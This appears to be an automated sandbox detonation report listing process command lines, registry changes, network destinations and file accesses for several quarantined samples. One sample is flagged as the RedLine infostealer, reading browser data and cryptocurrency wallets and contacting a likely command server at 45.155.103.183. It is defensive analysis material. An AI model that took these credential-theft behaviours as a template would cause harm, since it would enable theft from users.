"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1884 /prefetch:2

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 2.18.27.9:443 www.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_3436_JQSGNDKHYJBGHXJV

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

140s

Max time network

129s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
GB 45.155.103.183:1488 tcp

Files


Analysis: behavioral7

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

132s

Max time network

127s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0717ca9a888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775428" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D510E851-F49B-11EF-AD39-C6DA928D33CD} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000eba15ff6a26adf4190e2c511d7f690ff000000000200000000001066000000010000200000002ed4da672ee940d3c700cbbb26143d01912799669aa7961531ccc92a5aebbfe4000000000e8000000002000020000000105753d3cb13f77f05d64547ce6413da8085f25b779a989bf8b8a172b7dd341920000000b5d1fed2b67c8f651545a075c42ed78f868f8800c9bd62709714a6d44b9b13db40000000bfedb8596175908e7598118d139cf3d43bd67dc275a2746533d90d11126dc05ca0725a4d21cdb76a09436104d095ae905d977960dbccba47d37c064b4422f20d C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:988 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files


Analysis: behavioral8

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

146s

Max time network

141s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4272 wrote to memory of 768 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8297446f8,0x7ff829744708,0x7ff829744718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3488 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_4272_WTMVUIIIXJRTXJUS

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Analysis: behavioral27

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20241010-en

Max time kernel

69s

Max time network

136s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000035270b48ffd339449e8f5ccf493e442b0000000002000000000010660000000100002000000094d987120c6896d8c062d8158b3a8227578fe5620e5973003b6c221cdbf269c2000000000e8000000002000020000000d8441a2eac2613efa649ad32498b145c1af05d9d376c9cb5c052ce9ed90b12039000000031051a890e942721d7337c1363b75e0919df42ec9da746cf1a8f46ae61ab3cb59449a3670a29f98f5f57a5e963607fec50f28c1c28a918f5c6d7a03d3d6305d21019140465b277102ed5173019037a0706a2cd093b49eb5bd705ec67ab7c951dad814437875c0295e967273e5b2507f6301679e2082852770a238199fe443de8e00785a60d0e9f94cb334bf3bfb5043840000000b74b126ebe2c2acd66596bc9dc360467d64c214549694f73e3ebdf5502b6ab17d692d1a7155b6508433c708ef99c5fa5774906e7637d5f019066609762e46e50 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D8BC3541-F49B-11EF-AA78-72B5DC1A84E6} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
